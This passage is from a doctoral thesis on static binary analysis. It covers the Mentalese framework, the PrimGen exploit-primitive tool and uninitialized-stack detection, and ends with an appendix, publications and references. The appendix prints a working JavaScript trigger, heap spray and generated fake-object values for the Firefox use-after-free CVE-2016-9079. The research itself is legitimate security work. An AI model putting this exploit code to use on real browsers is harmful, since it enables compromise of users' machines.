dynamic systems is that for each detected uninitialized bug an input vector can be derived. On the other hand, only executed paths will be detected and hence the code coverage is typically low. In addition, an appropriate corpus of input data is needed. In contrast, our static approach is capable of analyzing binary executables in a scalable way that provides high code coverage. In summary, the wealth of work in recent research, most of which rely on source code, is tailored to instrumentation purposes to aid dynamic analysis in a monitoring environment. In contrast, our approach follows a purely large-scale static analysis that addresses the proactive detection of bugs in binary executables. 126 5.6. Conclusion

5.6 Conclusion

Uninitialized memory reads in an application can be utilized by an attacker for a variety of possibilities, the typical use case being an information leak that allows an attacker to subsequently bypass information hiding schemes. In this chapter, we proposed a novel static analysis approach to detect such vulnerabilities, with a focus on uninitialized stack variables. The modularity of our framework enables flexibility. We have built a prototype of the proposed approach that is capable of doing large-scale analyses to detect uninitialized memory reads in both synthetic examples as well as complex, real-world binaries. We believe that our system delivers new impulses to other researchers. 6 Conclusion

In this thesis we tackled a niche in the sector of program analysis which targets binary executables. It poses many difficult challenges which we faced throughout this thesis, but we have also seen some of its pleasant benefits. In large code bases with billions of lines of code it is unclear how different modules might interact. Subsets of the code base get orchestrated to be compiled to a single binary according to operating system, architecture, and selected features which might be specific to the platform or architecture. Analyzing the binary lets us focus on the purposed context and it gives access to approach whole program analysis. Building analysis tools in this sector needs a strong foundation that should give researchers access to building blocks. As we saw, the intermediate steps in the renaming algorithm of SSA can give us valuable information to be incorporated in the process of the analysis. It is crucial to enable access to these inner workings, and all the algorithms that serve as building blocks. We set great value on flexibility that allows us to concentrate on the problem itself, put ourselves as humans into a feedback loop, and allow other analyses procedures to contribute to knowledge that each analysis can benefit from in a transparent fashion. Besides flexibility, we also put great value on scalability and reliability. Many research projects do not scale on real world programs or crash. These were the motivations behind Mentalese, a framework that strives to ease the process of developing analyses. In the second chapter we gave an overview on the landscape of intermediate languages, how they serve in our field, and how we approached the field with VEX-IR. Based on VEX-IR we started to built static analyses and a symbolic execution engine which had the single purpose to process paths only. We used this

127 128 6. Conclusion engine in the process of finding suitable paths to trigger dynamic hooks [207]. An extension of this engine served in the process of a cross-architecture bug search [158]. At the end of the chapter we discussed why we made the change to an IL that was more suitable to our needs. Built on top of Amoco [198], we developed SymIL and it serves in the preprocessing stage of Mentalese where the CFG of the binary is reconstructed by off-the-shelf tools, put into a JSON, piped into Amoco, lifted to SymIL, and finally transformed into Mental-IR. This process is detailed in Chapter 3 where we present Mentalese. Here we show how Datalog naturally fits into how we wanted to approach binary analysis, specifically with regards to dataflow problems. We describe how we implemented our libraries and building blocks and how all of the components contribute to knowledge in a transparent fashion. Special care is given to the pointer analysis which is an important building block to improve the precision of many analyses. We show how pointer analysis, taint analysis, slicing, and value propagation relate to each other as derivatives of the same basic patterns that are put into declarative algorithms. At the end of this chapter we show that the pointer analysis aids as a building block in an early stage of a binary similarity procedure. In Chapter 4 we present PrimGen, a tool built on top of Mentalese. Here we follow the goal to locate reachable exploitation primitives in complex binary code such as modern browsers. Given a crashing input and a point of control, PrimGen combines static and binary analysis techniques to find exploitation primitives. PrimGen not only finds these primitives, but seeks for satisfiable paths that drive the execution into an exploitable state. These paths are verified dynamically. Given the original PoC, it was interesting to see how a bug that gives control to an object field can be exploited in a variety of ways. With PrimGen we found 48 alternative ways to drive execution to exploitable states. In Chapter 5 we present another prototype that builds on Mentalese. Here we make excessive use of its pointer analysis component. Our prototype manages to unveil uninitialized stack variables in real world binaries. To tackle path-sensitivity it tries to put symbolic execution into the feedback loop which manages to filter our warnings. Please recall from Figure 3.2 and Figure 5.2 that Mentalese has a feedback loop where knowledge can be added to Mental-IR to improve the precision of the analyses. However, the greater vision here was to add more dynamic techniques, especially fuzzers into the feedback loop and induce a synergy between them which we left for future work. 6. Conclusion 129

Overall we have just scratched the surface of what is possible. Mentalese can be used in a variant analysis on binaries in a similar fashion as Semmle’s QL does it on source code. Mentalese can be used as a fast and light weight preprocessing static analyzer that guides dynamic approaches into interesting spots. The benefits of static analysis is often linked to its theoretic property of full coverage. However, the greater value we see is its ability to start the analysis at each program point which is compliant with what we seek in terms of flexibility. We argue that adding knowledge to the analyzer at any point in time and where all other algorithms adapt transparently is a powerful feature that harmonizes with the idea to put dynamic analyses into the process. The motivation here is to add dynamic analyzers into the process which introduce knowledge hard to compute by static approaches, and in turn static approaches put knowledge into the loop that are hard for dynamic approaches. The idea is not new, however a synergy between these approaches is hard to achieve. With synergy we see static and dynamic analyzers that continuously add knowledge to the analysis process where each analyzer transparently adapts to new information that is interesting for its specific need to either proceed or add precision. Future work would need to investigate and implement this vision. 130 Appendices

131

A JavaScript Code Corresponding to CVE-2016-9079

This appendix contains the JavaScript code that corresponds to our running example in Chapter 4. Please refer to https://github.com/RUB-SysSec/PrimGen for all the data that were generated and used for our Evaluation. In the following we list all components of a generated EPT script corresponding to our running example from Figure 4.4. Listing A.1 shows the JS code that is needed to trigger the vulnerability (CVE-2016-9079). Listing A.1 merged together with Listing A.2 execute Firefox 50.0.1 32bit to the control point. This merged code is used as a template, fed into PrimGen, whereby the gen() function is existent (as in Listing A.3), but does not set any specific values, yet. PrimGen then creates code shown in Listing A.3 based on the generated memory map to set memory values. Hence, all three JS code listings merged together, constitute an EPT example generated by PrimGen to perform the exploitation primitive shown by our running example in Figure 4.4.

function VUT(){ /* bug trigger ripped from bugzilla report*/ var worker= new Worker(’data:javascript,self.onmessage=function(msg){postMessage(" one");postMessage("two");};’); worker.postMessage("zero"); svgns=’http://www.w3.org/2000/svg’; heap80= new Array(0x1000); heap100= new Array(0x4000); block80= new ArrayBuffer(0x80); block100= new ArrayBuffer(0x100); sprayBase= undefined; arrBase= undefined; animateX= undefined; containerA= undefined; var offset=0x88// Firefox 50.0.1

133 134 A. JavaScript Code Corresponding to CVE-2016-9079

var exploit= function (){ var u32= new Uint32Array(block80) u32[0x4] = arrBase- offset; u32[0xa] = arrBase- offset; u32[0x10] = arrBase- offset; u32[0] = 0xaabbccdd; u32[1] = 0xaabbccee; u32[0x11]=0xaabbccff; for(i= heap100.length/2;i< heap100.length;i++) { heap100[i] = block100.slice(0) } for(i = 0;i< heap80.length/2;i++) { heap80[i] = block80.slice(0) } animateX.setAttribute(’begin’,’59s’) animateX.setAttribute(’begin’,’58s’) for(i= heap80.length/2;i< heap80.length;i++) { heap80[i] = block80.slice(0) } for(i= heap100.length/2;i< heap100.length;i++) { heap100[i] = block100.slice(0) } animateX.setAttribute(’begin’,’10s’) animateX.setAttribute(’begin’,’9s’) containerA.pauseAnimations(); }// end exploit()

/* spray fake objects*/ heap= prepare_memory() worker.onmessage= function (e){arrBase=base_addr; exploit()}

} var trigger= function (){ containerA= document.createElementNS(svgns,’svg’) var containerB= document.createElementNS(svgns,’svg’); animateX= document.createElementNS(svgns,’animate’) var animateA= document.createElementNS(svgns,’animate’) var animateB= document.createElementNS(svgns,’animate’) var animateC= document.createElementNS(svgns,’animate’) var idA="ia"; var idC="ic"; animateA.setAttribute(’id’, idA); animateA.setAttribute(’end’,’50s’); animateB.setAttribute(’begin’,’60s’); animateB.setAttribute(’end’, idC+’.end’); animateC.setAttribute(’id’, idC); animateC.setAttribute(’end’, idA+’.end’); containerA.appendChild(animateX) containerA.appendChild(animateA) containerA.appendChild(animateB) containerB.appendChild(animateC) document.body.appendChild(containerA); document.body.appendChild(containerB); }

VUT(); window.onload= trigger; setInterval("window.location.reload()", 3000) Listing A.1: VUT: JS code to trigger CVE-2016-9079 in Firefox 50.0.1 A. JavaScript Code Corresponding to CVE-2016-9079 135

/* address of fake object*/ base_addr=0x30300000

/* heap spray inspired by skylined*/ function prepare_memory(){ var heap = [] var current_address=0x08000000 var block_size= 0x01000000

function set(offset, value){ heap_block[idx/4 + offset/4] = value; }

function gen(){...}

while (current_address< base_addr){ var heap_block= new Uint32Array(block_size/4 - 0x100) for( var idx= 0; idx< block_size; idx+= 0x100000){ gen(); } heap.push(heap_block) current_address += block_size } return heap } Listing A.2: JS code to spray the heap in Firefox 50.0.1 in order to fill memory with controlled values

function gen(){ /* automatically generated code*/ set(0xac, 0x1); set(0x70, base_addr+0x110); set(0x0, base_addr+0x1094); set(0x10ac, 0xff); set(0x10a8, base_addr+0x20ac); set(0x20ac, base_addr+0x2f74); set(0x30ac, base_addr+0x220); } Listing A.3: JS object fields generated by PrimGen to perform the desired exploitation primitive in the running example 136 Publications

During the time of this dissertation, the author contributed to the following publications:

• Static Detection of Uninitialized Stack Variables in Binary Code Behrad Garmany, Martin Stoffel, Robert Gawlik, Thorsten Holz. In European Symposium on Research in Computer Security (ESORICS), Luxembourg, September 2019

• Towards Automated Generation of Exploitation Primitives for Web Browsers Behrad Garmany, Martin Stoffel, Robert Gawlik, Philipp Koppe, Tim Blazytko, Thorsten Holz. In Annual Computer Security Applications Conference (ACSAC), SanJuan, Puerto Rico, USA, December 2018

• Automated Multi-Architectural Discovery of CFI-Resistant Code Gadgets Patrick Wollgast, Robert Gawlik, Behrad Garmany, Benjamin Kollenda, Thorsten Holz. In European Symposium on Research in Computer Security (ESORICS), Heraklion, Greece, September 2016

• Detile: Fine-Grained Information Leak Detection in Script Engines Robert Gawlik, Philipp Koppe, Benjamin Kollenda, Andre Pawlowski, Behrad Garmany, Thorsten Holz. In Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA), Donostia-San Sebastián, Spain, July 2016

• Enabling Client-Side Crash-Resistance to Overcome Diversification and Information Hiding. Robert Gawlik, Benjamin Kollenda, Philipp Koppe, Behrad Garmany, Thorsten Holz. In Annual Network & Distributed System Security Symposium (NDSS), February 2016

• Cross-Architecture Bug Search in Binary Executables Jannik Pewny, Behrad Garmany, Robert Gawlik, Christian Rossow, Thorsten Holz. In 36th IEEE Symposium on Security and Privacy (Oakland), San Jose, May 2015

• Dynamic Hooks: Hiding Control Flow Changes within Non-Control Data Sebastian Vogl, Robert Gawlik, Behrad Garmany, Thomas Kittel, Jonas Pfoh, Claudia Eckert, and Thorsten Holz. In 23rd USENIX Security Symposium, San Diego, CA, USA, August 2014

• PRIME: Private RSA Infrastructure for Memory-less Encryption Behrad Garmany, Tilo Müller. In Annual Computer Security Applications Confer- ence (ACSAC), New Orleans, USA, December 2013 **Outstanding Paper Award**

137 138 References

[1] Martín Abadi et al. “Control-Flow Integrity”. In: ACM Conference on Computer and Communications Security (CCS). 2005. [2] A. V. Aho, J. E. Hopcroft, and J. D. Ullman. “On Finding Lowest Common Ancestors in Trees”. In: Proceedings of the Fifth Annual ACM Symposium on Theory of Computing. 1973. [3] Alfred V. Aho and Margaret J. Corasick. “Efficient String Matching: An Aid to Bibliographic Search”. In: Commun. ACM 18.6 (1975), pp. 333–340. [4] Alfred V. Aho et al. Compilers: Principles, Techniques, and Tools (2Nd Edition). Boston, MA, USA: Addison-Wesley Longman Publishing Co., Inc., 2006. [5] Periklis Akritidis. “Cling: A Memory Allocator to Mitigate Dangling Pointers”. In: USENIX Security Symposium. 2010. [6] Jeffrey Ullman Alfred Aho Ravi Sethi and Monica S. Lam. Compilers: Principles, Techniques, and Tools. 2006. [7] Lars Ole Andersen. “Program Analysis and Specialization for the C Programming Language”. PhD thesis. DIKU, University of Copenhagen, 1994. [8] P Anderson. “The Use and Limitations of Static-Analysis Tools to Improve Software Quality”. In: 21 (June 2008). [9] Dennis Andriesse et al. “An In-Depth Analysis of Disassembly on Full-Scale x86/x64 Binaries”. In: USENIX Security Symposium. 2016. [10] Molham Aref et al. “Design and Implementation of the LogicBlox System”. In: Proceedings of the 2015 ACM SIGMOD International Conference on Management of Data. Association for Computing Machinery, 2015. [11] Michalis Athanasakis et al. “The Devil is in the Constants: Bypassing Defenses in Browser JIT Engines”. In: Symposium on Network and Distributed System Security (NDSS). 2015. [12] Thanassis Avgerinos et al. “AEG: Automatic Exploit Generation”. In: Symposium on Network and Distributed System Security (NDSS). 2011. [13] Ivan Baev. Profile-based Indirect Call Promotion. https://llvm.org/devmtg/2015-10/slides/Baev-IndirectCallPromotion.pdf. 2015. [14] Vasanth Bala, Evelyn Duesterwald, and Sanjeev Banerjia. “Dynamo: a transparent dynamic optimization system”. In: ACM SIGPLAN Notices (2000). [15] Gogul Balakrishnan et al. “Model checking x86 executables with CodeSurfer/x86 and WPDS++”. In: Computer Aided Verification. Springer. 2005, pp. 158–163.

139 140 References

[16] George Balatsouras and Yannis Smaragdakis. “Structure-sensitive points-to analysis for C and C++”. In: International Static Analysis Symposium. Springer. 2016, pp. 84–104. [17] T. Bao et al. “Your Exploit is Mine: Automatic Shellcode Transplant for Remote Exploits”. In: IEEE Symposium on Security and Privacy. 2017. [18] Fabrice Bellard. “QEMU, a Fast and Portable Dynamic Translator”. In: Proceedings of the Annual Conference on USENIX Annual Technical Conference. USA: USENIX Association, 2005. [19] Michael A. Bender et al. “Lowest common ancestors in trees and directed acyclic graphs”. In: J. Algorithms 57 (2005). [20] Dirk Beyer et al. “The software model checker Blast”. In: International Journal on Software Tools for Technology Transfer 9.5-6 (2007), pp. 505–525. [21] Armin Biere et al. “Symbolic Model Checking Without BDDs”. In: Proceedings of the 5th International Conference on Tools and Algorithms for Construction and Analysis of Systems. 1999. [22] Marcel Böhme, Van-Thuan Pham, and Abhik Roychoudhury. “Coverage-based Greybox Fuzzing As Markov Chain”. In: ACM Conference on Computer and Communications Security (CCS). 2016. [23] Marcel Böhme et al. “Directed Greybox Fuzzing”. In: ACM Conference on Computer and Communications Security (CCS). 2017. [24] François Bourdoncle. “Efficient chaotic iteration strategies with widenings”. In: Formal Methods in Programming and Their Applications. Vol. 735. Lecture Notes in Computer Science. Springer Berlin Heidelberg, 1993. Chap. 9, pp. 128–141. [25] Robert S. Boyer, Bernard Elspas, and Karl N. Levitt. “SELECT—a Formal System for Testing and Debugging Programs by Symbolic Execution”. In: Proceedings of the International Conference on Reliable Software. 1975. [26] Derek Bruening, Evelyn Duesterwald, and Saman Amarasinghe. “Design and implementation of a dynamic optimization framework for Windows”. In: 4th ACM Workshop on Feedback-Directed and Dynamic Optimization (FDDO-4). 2001. [27] Derek Bruening and Qin Zhao. “Practical Memory Checking with Dr. Memory”. In: Proceedings of the 9th Annual IEEE/ACM International Symposium on Code Generation and Optimization. 2011. [28] David Brumley and James Newsome. Alias analysis for assembly. Tech. rep. Technical Report CMU-CS-06-180, Carnegie Mellon University School of Computer Science, 2006. [29] David Brumley et al. “Automatic Patch-Based Exploit Generation is Possible: Techniques and Implications”. In: IEEE Symposium on Security and Privacy. 2008. [30] David Brumley et al. “BAP: A binary analysis platform”. In: Computer aided verification. Springer. 2011, pp. 463–469. [31] Randal E Bryant. “Graph-based algorithms for boolean function manipulation”. In: Computers, IEEE Transactions on 100.8 (1986), pp. 677–691. References 141

[32] Christopher Budd. Pwn2Own: Day 2 and Event Wrap-Up. http://blog.trendmicro.com/pwn2own-day-2-event-wrap/. March 2016. [33] Nathan Burow et al. “Control-Flow Integrity: Precision, Security, and Performance”. In: arXiv preprint arXiv:1602.04056 (2016). [34] Simon Busard and Charles Pecheur. “PyNuSMV: NuSMV as a python library”. In: NASA Formal Methods Symposium. Springer. 2013, pp. 453–458. [35] D. Callahan. “The Program Summary Graph and Flow-sensitive Interprocedual Data Flow Analysis”. In: Proceedings of the ACM SIGPLAN 1988 Conference on Programming Language Design and Implementation. PLDI ’88. 1988. [36] S. Ceri, G. Gottlob, and L. Tanca. “What you always wanted to know about Datalog (and never dared to ask)”. In: IEEE Transactions on Knowledge and Data Engineering (1989). [37] S. Ceri, G. Gottlob, and L. Tanca. “What you always wanted to know about Datalog (and never dared to ask)”. In: IEEE Transactions on Knowledge and Data Engineering (1989). [38] Silvio Cesare and Yang Xiang. “Static analysis of binaries”. In: Software Similarity and Classification. Springer, 2012, pp. 41–49. [39] Sang Kil Cha et al. “Unleashing Mayhem on Binary Code”. In: IEEE Symposium on Security and Privacy. 2012. [40] Shuo Chen et al. “Non-Control-Data Attacks Are Realistic Threats.” In: USENIX Security Symposium. 2005. [41] Wei Chen and Juan Vazquez. "Hack Away at the Unessential" with ExpLib2 in Metasploit. https://blog.rapid7.com/2014/04/07/hack-away-at-the- unessential-with-explib2-in-metasploit/. 2014. [42] X. Chen, A. Slowinska, and H. Bos. “Who allocated my memory? Detecting custom memory allocators in C binaries”. In: 2013 20th Working Conference on Reverse Engineering (WCRE). 2013. [43] Xi Chen, Asia Slowinska, and Herbert Bos. “On the Detection of Custom Memory Allocators in C Binaries”. In: Empirical Softw. Engg. 21.3 (June 2016). [44] Xi Chen et al. “StackArmor: Comprehensive Protection from Stack-based Memory Error Vulnerabilities for Binaries”. In: Symposium on Network and Distributed System Security (NDSS). 2015. [45] Yuki Chen. ExpLib2 JavaScript Library. https://github.com/jvazquez-r7/explib2. 2014. [46] Dustin Childs. Pwn2Own 2015: Day Two Results. http://community.hpe.com/t5/Security-Research/Pwn2Own-2015-Day-Two- results/ba-p/6722884. March 2015. [47] Alessandro Cimatti et al. “Nusmv 2: An opensource tool for symbolic model checking”. In: Computer Aided Verification. Springer. 2002, pp. 359–364. [48] clang. clang: a C language family frontend for LLVM. Accessed 2017-10-09. url: http://clang.llvm.org. 142 References

[49] Edmund Clarke, Daniel Kroening, and Flavio Lerda. “A tool for checking ANSI-C programs”. In: Tools and Algorithms for the Construction and Analysis of Systems. Springer, 2004, pp. 168–176. [50] Edmund Clarke et al. “Counterexample-guided abstraction refinement”. In: Computer aided verification. Springer. 2000, pp. 154–169. [51] Edmund Clarke et al. “SATABS: SAT-based predicate abstraction for ANSI-C”. In: Tools and Algorithms for the Construction and Analysis of Systems. Springer, 2005, pp. 570–574. [52] Edmund M Clarke and E Allen Emerson. Design and synthesis of synchronization skeletons using branching time temporal logic. Springer, 1981. [53] Frederick B. Cohen. “Operating System Protection through Program Evolution”. In: Comput. Secur. 12.6 (Oct. 1993), 565–584. [54] Kees Cook. “Kernel Exploitation Via Uninitialized Stack”. In: DEF CON 19. 2011. url: https://www.defcon.org/images/defcon-19/dc-19- presentations/Cook/DEFCON-19-Cook-Kernel-Exploitation.pdf. [55] Patrick Cousot and Radhia Cousot. “Abstract Interpretation: A Unified Lattice Model for Static Analysis of Programs by Construction or Approximation of Fixpoints”. In: Proceedings of the 4th ACM SIGACT-SIGPLAN Symposium on Principles of Programming Languages. 1977. [56] CVE-2012-1889. Vulnerability in Microsoft XML Core Services. http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1889. [57] CVE-2014-6355. Graphics Component Information Disclosure Vulnerability. http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6355. [58] CVE-2015-0061. TIFF Processing Information Disclosure Vulnerability. http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0061. [59] CVE-Statistics-Chrome. Google Chrome Vulnerability Statistics. http://www.cvedetails.com/product/15031/Google-Chrome.html. 2014. [60] CVE-Statistics-Firefox. Mozilla Firefox Vulnerability Statistics. http://www.cvedetails.com/product/3264/Mozilla-Firefox.html. 2014. [61] CVE-Statistics-IE. Microsoft Internet Explorer Vulnerability Statistics. http: //www.cvedetails.com/product/9900/Microsoft-Internet-Explorer.html. 2014. [62] CWE-1104: Use of Unmaintained Third Party Components. https://cwe.mitre.org/data/definitions/1104.html. [63] Ron Cytron et al. “Efficiently computing static single assignment form and the control dependence graph”. In: ACM Transactions on Programming Languages and Systems (TOPLAS) 13.4 (1991), pp. 451–490. [64] DARPA. DARPA | Cyber Grand Challenge. Accessed 2018-01-22. url: http://archive.darpa.mil/cybergrandchallenge/. [65] Debian and Ubuntu OpenSSL packages contain a predictable random number generator. https://www.kb.cert.org/vuls/id/925211/, Accessed 2018-01-09. [66] Artem Dergachev. Clang Static Analyzer - A Checker Developer’s Guide. GitHub, 2016. url: https://github.com/haoNoQ/clang-analyzer-guide. References 143

[67] David Dewey, Bradley Reaves, and Patrick Traynor. “Uncovering Use-After-Free Conditions in Compiled Code”. In: Availability, Reliability and Security (ARES), 2015 10th International Conference on. IEEE. 2015, pp. 90–99. [68] Artem Dinaburg and Andrew Ruef. “Mcsema: Static translation of x86 instructions to llvm”. In: ReCon 2014 Conference, Montreal, Canada. 2014. [69] Thomas Dullien and Sebastian Porst. “REIL: A platform-independent intermediate representation of disassembled code for static code analysis”. In: Proceeding of CanSecWest (2009). [70] Manuel Egele et al. “Blanket Execution: Dynamic Similarity Testing for Program Binaries and Components”. In: USENIX Security Symposium. 2014. [71] Dawson Engler and Daniel Dunbar. “Under-constrained execution: making automatic code destruction easy and scalable”. In: Proceedings of the 2007 international symposium on Software testing and analysis. ACM. 2007, pp. 1–4. [72] Isaac Evans et al. “Control Jujutsu: On the Weaknesses of Fine-Grained Control Flow Integrity”. In: ACM Conference on Computer and Communications Security (CCS). 2015. [73] Ansgar Fehnker et al. “Goanna a static model checker”. In: Formal Methods: Applications and Technology. Springer, 2006, pp. 297–300. [74] Ansgar Fehnker et al. “Model checking software at compile time”. In: Theoretical Aspects of Software Engineering, 2007. TASE’07. First Joint IEEE/IFIP Symposium on. IEEE. 2007, pp. 45–56. [75] Josselin Feist, Laurent Mounier, and Marie-Laure Potet. “Statically detecting use after free on binary code”. In: Journal of Computer Virology and Hacking Techniques 10.3 (2014), pp. 211–217. [76] H. Flake. Attacks on uninitialized local variables. 2006. [77] Halvar Flake. “Attacks on uninitialized local variables”. In: Black Hat EU. 2006. url: http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Flake.pdf. [78] J.A. Fodor. The Language of Thought. Language and thought series. Harvard University Press, 1975. [79] Behrad Garmany et al. “Towards Automated Generation of Exploitation Primitives for Web Browsers”. In: Proceedings of the 34th Annual Computer Security Applications Conference. ACSAC ’18. 2018. [80] Behrad Garmany et al. “Static Detection of Uninitialized Stack Variables in Binary Code”. In: Computer Security - ESORICS 2019 - 24th European Symposium on Research in Computer Security, Luxembourg, September 23-27, 2019, Proceedings, Part II. 2019. [81] Loukas Georgiadis. “Linear-time algorithms for dominators and related problems”. PhD thesis. Princeton, NJ, USA, 2005. url: ftp://ftp.cs.princeton.edu/techreports/2005/737.pdf. [82] Roberto Giacobazzi, Francesco Logozzo, and Francesco Ranzato. “Analyzing program analyses”. In: ACM SIGPLAN Notices (2015). 144 References

[83] A. Girard and C. Rommel. “Safety in Embedded Software Challenges in Growing from Rapid Rising of Third-Party Code”. In: ATZelektronik worldwide 11 (2016), pp. 18–23. [84] Cristiano Giuffrida, Lorenzo Cavallaro, and Andrew S. Tanenbaum. “Practical Automated Vulnerability Monitoring Using Program State Invariants”. In: Conference on Dependable Systems and Networks (DSN). 2013. [85] Patrice Godefroid, Nils Klarlund, and Koushik Sen. “DART: Directed Automated Random Testing”. In: Proceedings of the 2005 ACM SIGPLAN Conference on Programming Language Design and Implementation. PLDI ’05. 2005. [86] Patrice Godefroid, Michael Y. Levin, and David Molnar. “Automated whitebox fuzz testing”. In: In NDSS. 2008. [87] Enes Göktaş et al. “Undermining Entropy-based Information Hiding (And What to Do About It)”. In: USENIX Security Symposium. 2016. [88] Google. ClusterFuzz. https://github.com/google/oss-fuzz/blob/master/docs/clusterfuzz.md. Accessed: 2018-02-07. [89] Nikos Gorogiannis, Peter W. O’Hearn, and Ilya Sergey. “A True Positives Theorem for a Static Race Detector”. In: Proc. ACM Program. Lang. POPL (Jan. 2019). [90] Neville Grech and Yannis Smaragdakis. “P/Taint: Unified Points-to and Taint Analysis”. In: OOPSLA. New York, NY, USA: Association for Computing Machinery, 2017. [91] T. J. Green et al. Datalog and Recursive Query Processing. 2013. [92] Ben Grubb. Heartbleed disclosure timeline: who knew what and when. http://www.smh.com.au/it-pro/security-it/heartbleed-disclosure- timeline-who-knew-what-and-when-20140415-zqurk.html. Apr. 2014. [93] Jordan Gruskovnjak. Advanced Exploitation of Mozilla Firefox Use-after-free (MFSA 2012-22). http://web.archive.org/web/20150121031623/http: //www.vupen.com/blog/20120625.Advanced_Exploitation_of_Mozilla_ Firefox_UaF_CVE-2012-0469.php. 2012. [94] Istvan Haller, Asia Slowinska, and Herbert Bos. “MemPick: data structure detection in C/C++ binaries”. In: Proceedings of the 20th Working Conference on Reverse Engineering (WCRE). 2013. [95] Istvan Haller et al. “Dowsing for Overflows: A Guided Fuzzer to Find Buffer Boundary Violations”. In: USENIX Security Symposium. 2013. [96] Abdul-Aziz Hariri. VMware Exploitation through Uninitialized Buffers. https://www.thezdi.com/blog/2018/3/1/vmware-exploitation-through- uninitialized-buffers. March 2018. [97] Rebecca Hasti and Susan Horwitz. “Using Static Single Assignment Form to Improve Flow-insensitive Pointer Analysis”. In: ACM SIGPLAN Conference on Programming Language Design and Implementation (PLDI). 1998. [98] Sean Heelan. “Automatic generation of control flow hijacking exploits for software vulnerabilities”. MA thesis. University of Oxford, 2009. References 145

[99] Gerard J Holzmann. “The model checker SPIN”. In: IEEE Transactions on software engineering 23.5 (1997), p. 279. [100] R. Nigel Horspool and Nenad Marovac. “An Approach to the Problem of Detranslation of Computer Programs”. In: Comput. J. 23.3 (1980), pp. 223–229. [101] S. Horwitz, T. Reps, and D. Binkley. “Interprocedural Slicing Using Dependence Graphs”. In: Proceedings of the ACM SIGPLAN 1988 Conference on Programming Language Design and Implementation. PLDI ’88. Atlanta, Georgia, USA, 1988. [102] Susan Horwitz. “Precise Flow-Insensitive May-Alias Analysis is NP-Hard”. In: ACM Trans. Program. Lang. Syst. (1997). [103] Susan Horwitz, Thomas Reps, and Mooly Sagiv. Demand interprocedural dataflow analysis. Vol. 20. 4. ACM, 1995. [104] M. Hosken et al. Graphite Description Language. 2011. [105] Hong Hu et al. “Automatic Generation of Data-Oriented Exploits.” In: USENIX Security Symposium. 2015, pp. 177–192. [106] Free Software Foundation Inc. Using the GNU Compiler Collection (GCC). Accessed 2017-10-31. url: https://gcc.gnu.org/onlinedocs/gcc/Attribute-Syntax.html. [107] ISO/IEC. 9899 - Programming languages - C. Accessed 2018-02-19. url: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1124.pdf. [108] Daniel Jackson and Eugene J. Rollins. Chopping: A Generalization of Slicing. Tech. rep. In Proc. of the Second ACM SIGSOFT Symposium on the Foundations of Software Engineering, 1994. [109] Ke Jiang and Bengt Jonsson. “Using spin to model check concurrent algorithms, using a translation from c to promela”. In: MCC 2009. Department of Information Technology, Uppsala University. 2009, pp. 67–69. [110] Wesley Jin et al. “Recovering C++ Objects From Binaries Using Inter-Procedural Data-Flow Analysis”. In: Proceedings of ACM SIGPLAN on Program Protection and Reverse Engineering Workshop 2014. 2014. [111] Herbert Jordan, Bernhard Scholz, and Pavle Subotic. “Soufflé: On Synthesis of Program Analyzers”. In: Computer Aided Verification - 28th International Conference, CAV 2016, Toronto, ON, Canada, July 17-23, 2016, Proceedings, Part II. 2016. [112] Michael Kay. XSL Transformations (XSLT) Version 3.0. 2017. [113] John Kessenich, Dave Baldwin, and Randi Rost. The OpenGL Shading Language. 2014. [114] Sarfraz Khurshid, Corina S Păsăreanu, and Willem Visser. “Generalized symbolic execution for model checking and testing”. In: Tools and Algorithms for the Construction and Analysis of Systems. Springer, 2003, pp. 553–568. [115] Johannes Kinder et al. “Proactive detection of computer worms using model checking”. In: IEEE Transactions on Dependable and Secure Computing 7.4 (2010), pp. 424–438. [116] James C. King. “Symbolic Execution and Program Testing”. In: Commun. ACM (1976). 146 References

[117] Ted Kremenek. Finding software bugs with the Clang Static Analyzer. https://llvm.org/devmtg/2008-08/Kremenek_StaticAnalyzer.pdf. 2008. [118] Daniel Krupp et al. Cross Translational Unit Analysis in Clang Static Analyzer: Prototype and measurements. Accessed 2018-01-09. url: http://cc.elte.hu/clang-ctu/eurollvm17/abstract.pdf. [119] Robert P Kurshan. “Automata-theoretic verification of coordinating processes”. In: 11th International Conference on Analysis and Optimization of Systems Discrete Event Systems. Springer. 1994, pp. 16–28. [120] William Landi. “Undecidability of Static Analysis”. In: ACM Lett. Program. Lang. Syst. 1.4 (1992), 323–337. [121] Chris Lattner. LLVM. Accessed 2017-10-09. url: http://www.aosabook.org/en/llvm.html. [122] Chris Lattner and Vikram Adve. “LLVM: A Compilation Framework for Lifelong Program Analysis & Transformation”. In: Proceedings of the 2004 International Symposium on Code Generation and Optimization (CGO’04). Palo Alto, California, 2004. [123] Byoungyoung Lee et al. “Preventing Use-after-free with Dangling Pointers Nullification.” In: NDSS. 2015. [124] Juneyoung Lee et al. “Taming Undefined Behavior in LLVM”. In: ACM SIGPLAN Conference on Programming Language Design and Implementation (PLDI). 2017. [125] Thomas Lengauer and Robert Endre Tarjan. “A Fast Algorithm for Finding Dominators in a Flowgraph”. In: (1979). [126] Wenchao Li, Sanjit A. Seshia, and Somesh Jha. “CrowdMine: Towards Crowdsourced Human-assisted Verification”. In: Annual Design Automation Conference (DAC). 2012. [127] Wilson Lian, Hovav Shacham, and Stefan Savage. “A Call to ARMs: Understanding the Costs and Benefits of JIT Spraying Mitigations”. In: Symposium on Network and Distributed System Security (NDSS). 2017. [128] Cullen Linn and Saumya Debray. “Obfuscation of Executable Code to Improve Resistance to Static Disassembly”. In: ACM Conference on Computer and Communications Security (CCS). 2003. [129] Zhenhua Liu. Advanced Exploit Techniques Attacking the IE Script Engine. https://blog.fortinet.com/2014/06/16/advanced-exploit-techniques- attacking-the-ie-script-engine. 2014. [130] Benjamin Livshits et al. “In Defense of Soundiness: A Manifesto”. In: Commun. ACM 58.2 (Jan. 2015). [131] LLVM. Language Reference Manual. Accessed 2017-10-09. url: http://llvm.org/docs/LangRef.html. [132] Bruno Cardoso Lopes and Rafael Auler. Getting Start with LLVM Core Libraries. Packt Publishing, 2014. [133] Panagiotis Louridas. “Static Code Analysis”. In: IEEE Software 23.4 (2006), pp. 58–61. url: https://doi.org/10.1109/MS.2006.114. References 147

